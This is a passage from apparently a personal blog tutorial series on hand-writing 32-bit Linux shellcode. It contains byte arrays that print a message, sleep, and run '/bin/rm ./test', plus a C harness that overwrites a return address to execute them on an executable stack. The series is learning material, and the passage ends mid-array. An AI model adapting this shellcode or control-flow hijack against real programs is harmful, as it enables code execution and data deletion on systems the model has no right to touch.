<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: inherit;">There is nothing much to tell of the source code.</span> I use some instruction to reduce the code size, I will talk about reduce the code size in the next article.</div><div></div><div>And now compile the source code and use objdump to generate the shellcode.</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">All_shell.c</span></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span> <span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x39</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*relative jmp*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*pop %esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf1</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movl %esi, %ecx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xdb</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %ebx, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xf7</span><span style="color: #0f69ff;">\xe3</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mul %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x43</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*inc %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x04</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0x4, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb2</span><span style="color: #0f69ff;">\x08</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0x8, %dl*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x02</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %eax, %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*pushl %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x02</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movb $2, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*pushl %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe3</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*movl %esp, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xc9</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %ecx, %ecx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\xa2</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0xa2, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xc0</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %eax, %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x76</span><span style="color: #0f69ff;">\x09</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*leal 0x09(%esi),%esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*push %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf3</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov %esi, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x76</span><span style="color: #0f69ff;">\x08</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*lea 0x8(%esi), %esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x56</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*push %esi*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x53</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*push %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb0</span><span style="color: #0f69ff;">\x0b</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov $0xb, %al*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe1</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*mov %esp, %ecx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x51</span><span style="color: #0f69ff;">\x04</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*lea 0x4(%esp), %edx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xdb</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*xor %ebx, %ebx*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x43</span><span style="color: #0f69ff;">\x01</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*lea 0x1(%ebx), %eax*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*int $0x80*/</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xc2</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span> <span style="color: #595979;">/*relative call*/</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han!</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">void</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span> <span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ret<span style="color: #406080;">;</span>
ret <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ret <span style="color: #308080;">+</span> <span style="color: #008c00;">2</span><span style="color: #406080;">;</span>
<span style="color: #308080;">(</span><span style="color: #308080;">*</span>ret<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><div><span class="Apple-style-span" style="font-family: inherit;">compile it , use execstack to enable the executable stack and execute it. After that you will see the program first print a message, wait about two seconds and remove a file called "test".</span></div></div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-65479813082516939762011-07-02T09:06:00.000-07:002011-11-02T07:46:33.886-07:00Shell code 4(another trick)By far, the shell code can print a message and exit the program normally.<br />
Now I add a new feature in the previous shell code program. That is let the program wait 2 seconds and then exit.<br />
<br />
In order to do this, I need to use a new system call called "nanosleep". (my OS is ubuntu 10.10)<br />
use the following command to see what nanosleep do:<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">man nonosleep</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #004a43;">#</span><span style="color: #004a43;">include </span><span style="color: maroon;"><</span><span style="color: #40015a;">time.h</span><span style="color: maroon;">></span>
<span style="color: #200080; font-weight: bold;">int</span> nanosleep<span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">const</span> <span style="color: #200080; font-weight: bold;">struct</span> timespec <span style="color: #308080;">*</span>req<span style="color: #308080;">,</span> <span style="color: #200080; font-weight: bold;">struct</span> timespec <span style="color: #308080;">*</span>rem<span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #308080;">.</span><span style="color: #308080;">.</span><span style="color: #308080;">.</span><span style="color: #308080;">.</span>
<span style="color: #200080; font-weight: bold;">struct</span> timespec <span style="color: #406080;">{</span>
<span style="color: #003060;">time_t</span> tv_sec<span style="color: #406080;">;</span> <span style="color: #595979;">/* seconds */</span>
<span style="color: #200080; font-weight: bold;">long</span> tv_nsec<span style="color: #406080;">;</span> <span style="color: #595979;">/* nanoseconds */</span>
<span style="color: #406080;">}</span><span style="color: #406080;">;</span></pre><div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;"><i><b>P.S since I write a simple program to see the size of the timespec, and also the size of each fields. the time_t type is 4 bytes and long is 4 bytes, so the timespec is totally 8 bytes long.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b>Tips: you can write a C program that use the "sizeof()" MACRO to see the size of each type of variable.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;">The above are the information that I needed.</span><br />
<br />
<span class="Apple-style-span" style="font-family: inherit;">Now, as usual, write an inline assembly program.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep1.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/*the time_spec structure*/</span>
<span style="color: #200080; font-weight: bold;">char</span> t1_v<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: maroon;">"</span><span style="color: #0f69ff;">\x02</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">movl $t1_v, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre>Compile the source code and execute it, you will see that the program actually wait about 2 seconds then exit.<br />
However, just like the previous post: <a href="http://mike820324.blogspot.com/2011/06/shell-code-cont-3.html">Shell code 3(cont.)</a> I don't want the data is outside the shell code. Therefore, I use the same trick, the relative jmp/call trick, mentioned in the previous post.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep2.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* relative jmp/call trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pop </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .long 0x00000002,0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span> </pre><pre style="background-color: #f6f8ff; color: #000020; font-family: inherit; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">Compile the source code and test the result. (It works :D )<span class="Apple-style-span" style="font-family: inherit;"> </span></pre><span class="Apple-style-span" style="font-family: inherit;">Instead of using relative jmp/call trick to get the address of the data, is there any other way to get the address too?</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Why not just push the parameter to the stack, and the %esp will content the address of our data. Let's use this push trick to write our code.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep3.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* push trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><b>P.S remember that the stack grow down, therefore push the data in reverse order.</b><br />
Before writing the shellcode, I add the write system call into the inline assembly.<b> </b><br />
<span style="font-family: "Courier New",Courier,monospace;">sleep4.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/*</span>
<span style="color: #595979;"> * In this example I use both the </span>
<span style="color: #595979;"> * relative jmp/call trick and</span>
<span style="color: #595979;"> * push trick to get the data.</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><span class="Apple-style-span" style="font-family: inherit;">This is how the inline assembly looks like, it is pretty big now.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b><i> </i></b></span><br />
Again, compile the source code and test the result. If everything is correct, you will see the message and wait about 2 seconds then exit the program.<br />
If everything works fine, objdump the binary files.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-PNpfMVwtha4/TrFVdDAQukI/AAAAAAAAAJg/9eTaFYCBd_Q/s1600/shellcode3objdump.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="333" src="http://2.bp.blogspot.com/-PNpfMVwtha4/TrFVdDAQukI/AAAAAAAAAJg/9eTaFYCBd_Q/s400/shellcode3objdump.jpg" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pZYzYDw7FvM/Tg8_V_dCnwI/AAAAAAAAAFM/_ef8BxcbEL0/s1600/objdump.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br />
</a></div>Copy the machine code and paste into another source file as the shellcode.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep5.c</span><br />
/* This is the shellcode */<br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/* This is the shellcode */</span>
<span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x32</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x04</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xba</span><span style="color: #0f69ff;">\x07</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf1</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x6a</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x6a</span><span style="color: #0f69ff;">\x02</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe3</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb9</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\xa2</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
